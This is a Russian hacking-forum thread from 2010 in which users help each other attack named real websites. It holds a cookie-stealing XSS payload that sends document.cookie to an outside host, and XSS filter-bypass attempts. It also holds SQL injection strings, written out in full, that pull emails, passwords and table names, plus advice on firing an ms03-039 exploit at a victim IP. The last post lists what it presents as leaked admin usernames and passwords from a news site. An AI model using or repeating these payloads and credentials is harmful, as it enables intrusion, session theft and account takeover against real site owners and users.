Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

09.01.2010, 19:05
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме: 5290740
Репутация:
912
|
|
Сообщение от Nightmarе
Очередная проблемма.
Нашёл активную XSS на нужном мне сайте.
Ограничение в 50 символов + не позволяет писать слово script
Алерт то выводится нормально, а вот как на боевой сниффер подогнать, я хз, может как и можно, если да, то подскажите.
создай на своём хосте 1.js в него впиши
PHP код:
img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie;
ну и где ты там нашел xss впиши :
PHP код:
<script src=http://site.ru/1.js></script>
|
|
|

09.01.2010, 20:15
|
|
Новичок
Регистрация: 18.07.2008
Сообщений: 12
Провел на форуме: 99313
Репутация:
3
|
|
Речь о сайте онлайновой РПГ. Тут MS SQL, не имел с ний дела никогда и не нашел ничего внятного, везде практически речь о MySQL.
выглядит так: Выводит страницу которая показывает характеристики персонажа и кол-во уровней до ресета.
Примерно так:
Status On
Name Fate
Class Fairy Elf
Level 1
Resets 0
PK Level Default
Map Devias
Strenght 22
Agility 25
Vitality 10
Energy 15
[code]/reset?char=Fate'[code] выводит ошибку БД соответсвенно,
та же ошибка та же в регестрации в поле e-mail.
Код:
char/Fate'%20or%201=1--%20%20SELECT%20*%20FROM%20product%20WHERE%20PCategory=#char# or 1=1--
дает вывод
Status
Name darkknight
Class Dark Knight
Level 1
Resets 0
PK Level Default
Map Lorencia
Strenght 18
Agility 18
Vitality 15
Energy 30
Вроде все так, но в поле статус отсутствуют данные, а поля Strenght, Agility, Vitality, Energy не соответствуют полю класс, то есть если поле класс у нас Dark Knight, то эти поля не могут иметь такие значения.
Вопрос, инъекция ли это и можно ли извлечь что либо полезное из всего этого? Если можно, то подскажите плз где можно почитать подробно про MS SQL inj.
Последний раз редактировалось Cry Wolf; 09.01.2010 в 20:17..
|
|
|

10.01.2010, 00:07
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме: 3217552
Репутация:
1668
|
|
Сообщение от v1d0qz
Немогу понять, почему так пишет что перебор с колонками..
http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=111+or(1 ,1)=(select+count(*),concat(version(),floor(rand(0 )*2))from(information_schema.tables)GROUP+BY+2)#
а так всё ок.
http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=111+or(1 ,1)=(select*from(select+name_con st(version(),1),name_const(version(),1))e)
Код:
http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=1111+or+(select+count(*)+from+w3t_Posts+group+by+concat(version(),floor(rand(0)*2)))+--+
|
|
|

10.01.2010, 00:55
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме: 282022
Репутация:
4
|
|
хелп, подскажите плз, что-то не могу понять опять, подставлял во все столбцы, но что-то ничего не отображается.. ((
пробовал кодировать/декодировать, шифровать.. но вродеж он и без этого должен цифры отображать нормально?
пробовал хексить слово и потом по коду искать, но тоже ни как..
Код:
_ttp://www.asian ewsnet.net/news.php?id=-60+union+select+1,2,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
зы И еще на другом сайте пробую просмотреть таблицы, так показывает таблицу
Код:
?id=-11+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+
но почему-то не могу к ней подключиться, ошибку пишет
Код:
?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+tablename+--+
Последний раз редактировалось Gidz; 10.01.2010 в 02:45..
|
|
|

10.01.2010, 01:17
|
|
Banned
Регистрация: 07.01.2010
Сообщений: 132
Провел на форуме: 63422
Репутация:
8
|
|
вопрос по скулю:
Цитата:
+and+(select+top+1+isnull(cast([email]+as+nvarchar(4000)),char(32))%2bchar(94)%2bisnull( cast([password]+as+nvarchar(4000)),char(32))+from+[jackson]..[users]+where+email+not+in+(select+top+1+email+from+[jackson]..[users]+where+1=1+order+by+[email])+)%3E0--
тут выводится в ответе email@domain.com^passmy
Возможно ли сделать запрос чтобы выдавало не email@domain.com^passmy
а !!!email@domain.com^passmy!!!
Тоесть надо добавит 0x212121 в начало и конец каждого ответа
это чтоб со страницы корректно спарсит нужно
|
|
|

10.01.2010, 06:24
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме: 5749763
Репутация:
1680
|
|
Сообщение от .:[melkiy]:.
создай на своём хосте 1.js в него впиши
PHP код:
img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie;
ну и где ты там нашел xss впиши :
PHP код:
<script src=http://site.ru/1.js></script>
Скрипт не позволяет использовать значения <script в любом регистре, причём он его не проглатывает, а именно не пропускает эту информацию выдавая ошибку. (поэтому не надо предлогать варианты типа <scri<script>pt>)
Я пробовал <scr<!-- -->ipt>, так он пропускает, но код становится не рабочим (хотя в манах по XSS такой способ рекомендовали), может быть я не так HTML коментарий использую?
Поправка:
Останавливает передачу, если замечено значение <script (вместе с одной ковычкой), без ковычек пропускает спокойно, такое значение script> или </script> тоже спокойно пропускает. На регистр так-же не обращяет внимание.
Очень надеюсь на помощь, и разумный ответ.
Последний раз редактировалось Nightmarе; 10.01.2010 в 11:38..
|
|
|

10.01.2010, 09:27
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме: 2621544
Репутация:
412
|
|
маф
Сообщение от Gidz
хелп, подскажите плз, что-то не могу понять опять, подставлял во все столбцы, но что-то ничего не отображается.. ((
пробовал кодировать/декодировать, шифровать.. но вродеж он и без этого должен цифры отображать нормально?
пробовал хексить слово и потом по коду искать, но тоже ни как..
туц
asianewsnet.net/news.php?id=999999999999+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*-+&sec=2
зы И еще на другом сайте пробую просмотреть таблицы, так показывает таблицу
Код:
?id=-11+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+
но почему-то не могу к ней подключиться, ошибку пишет
Код:
?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+tablename+--+
[/QUOTE]
Возможно скрипт работает с другой БД.Укажите в запросе имя БД
Код:
-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+database.tablename+--+
Имя базы данных:
Код:
-11+union+select+1,2,3,concat_ws(0x3a,table_name,table_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+
Зы:Может не хватать прав на доступ
Последний раз редактировалось S00pY; 10.01.2010 в 09:32..
|
|
|

10.01.2010, 11:26
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме: 1096131
Репутация:
45
|
|
Намекните где можно почитать, как заюзать ms03-039 и есть ли он в метасплойте. Ато в мс я его не нашел (3,2), скачал скомпилированую версию, а как заюзать хз. В cmd выдает: usage 1.exe <target_ip>
Что дальше?
|
|
|

10.01.2010, 14:44
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме: 2621544
Репутация:
412
|
|
В cmd выдает: usage 1.exe <target_ip>
Ну запусти сплойт с параметром "<target_ip>" - это ip адрес жертвы
example:1.exe 192.168.0.1
Зы:Самого сплойта я не видел и насчет МС незнаю
|
|
|

10.01.2010, 15:21
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
2 Gidz
http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+1,1--
administrator:0641
http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+2,1--
admin123:admin123
http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+3,1--
ann:bkk1854
И так далее и тому подобное...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|